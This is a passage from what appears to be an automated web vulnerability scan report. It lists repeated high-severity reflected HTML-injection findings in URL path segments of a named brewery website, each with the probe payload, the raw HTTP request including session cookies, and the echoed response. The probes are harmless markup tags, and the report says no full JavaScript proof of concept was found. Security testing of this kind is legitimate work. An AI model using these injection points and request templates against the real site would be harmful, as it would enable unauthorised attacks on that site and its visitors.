X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help55e46"><a>dc8a43dd223_page" class="help55e46">
...[SNIP]...

1.182. http://www.ninkasibrewing.com/help/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99693"><a>74a561e9af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /help99693"><a>74a561e9af4/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="help99693"><a>74a561e9af4_page" class="help99693">
...[SNIP]...

1.183. http://www.ninkasibrewing.com/home/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215e5"><a>88974b7d081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home215e5"><a>88974b7d081/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home215e5"><a>88974b7d081_page" class="home215e5">
...[SNIP]...

1.184. http://www.ninkasibrewing.com/home/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c676"><a>e02e90da893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home1c676"><a>e02e90da893/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home1c676"><a>e02e90da893_page" class="home1c676">
...[SNIP]...

1.185. http://www.ninkasibrewing.com/home/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5e0"><a>d278f502dff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home9a5e0"><a>d278f502dff/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home9a5e0"><a>d278f502dff_page" class="home9a5e0">
...[SNIP]...

1.186. http://www.ninkasibrewing.com/home/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210e2"><a>b548d58de6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home210e2"><a>b548d58de6c/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home210e2"><a>b548d58de6c_page" class="home210e2">
...[SNIP]...

1.187. http://www.ninkasibrewing.com/home/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dede"><a>1e7eb0352e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home8dede"><a>1e7eb0352e9/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home8dede"><a>1e7eb0352e9_page" class="home8dede">
...[SNIP]...

1.188. http://www.ninkasibrewing.com/home/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbec0"><a>8202d7a7465 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homefbec0"><a>8202d7a7465/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="homefbec0"><a>8202d7a7465_page" class="homefbec0">
...[SNIP]...

1.189. http://www.ninkasibrewing.com/home/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /home/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 663bc"><a>df79f9bb41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home663bc"><a>df79f9bb41c/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="home663bc"><a>df79f9bb41c_page" class="home663bc">
...[SNIP]...

1.190. http://www.ninkasibrewing.com/media/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0abf"><a>00dc92c2364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mediaf0abf"><a>00dc92c2364/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="mediaf0abf"><a>00dc92c2364_page" class="mediaf0abf">
...[SNIP]...

1.191. http://www.ninkasibrewing.com/media/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b99e"><a>d353410d2d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media5b99e"><a>d353410d2d6/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="media5b99e"><a>d353410d2d6_page" class="media5b99e">
...[SNIP]...

1.192. http://www.ninkasibrewing.com/media/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94a33"><a>5b783fa7801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media94a33"><a>5b783fa7801/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="media94a33"><a>5b783fa7801_page" class="media94a33">
...[SNIP]...

1.193. http://www.ninkasibrewing.com/media/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73fdc"><a>3284c577b00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media73fdc"><a>3284c577b00/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="media73fdc"><a>3284c577b00_page" class="media73fdc">
...[SNIP]...

1.194. http://www.ninkasibrewing.com/media/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1309"><a>af44161986e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mediaf1309"><a>af44161986e/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="mediaf1309"><a>af44161986e_page" class="mediaf1309">
...[SNIP]...

1.195. http://www.ninkasibrewing.com/media/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba126"><a>4d385f007ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mediaba126"><a>4d385f007ef/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="mediaba126"><a>4d385f007ef_page" class="mediaba126">
...[SNIP]...

1.196. http://www.ninkasibrewing.com/media/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /media/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95c3f"><a>1b1450f199e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media95c3f"><a>1b1450f199e/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="media95c3f"><a>1b1450f199e_page" class="media95c3f">
...[SNIP]...

1.197. http://www.ninkasibrewing.com/merchandise/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc0d2"><a>96b73e45a3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandisecc0d2"><a>96b73e45a3f/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandisecc0d2"><a>96b73e45a3f_page" class="merchandisecc0d2">
...[SNIP]...

1.198. http://www.ninkasibrewing.com/merchandise/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22a36"><a>9072d5717d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise22a36"><a>9072d5717d1/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="merchandise22a36"><a>9072d5717d1_page" class="merchandise22a36">
...[SNIP]...

1.199. http://www.ninkasibrewing.com/merchandise/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /merchandise/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25227"><a>b79974bebcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /merchandise25227"><a>b79974bebcc/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

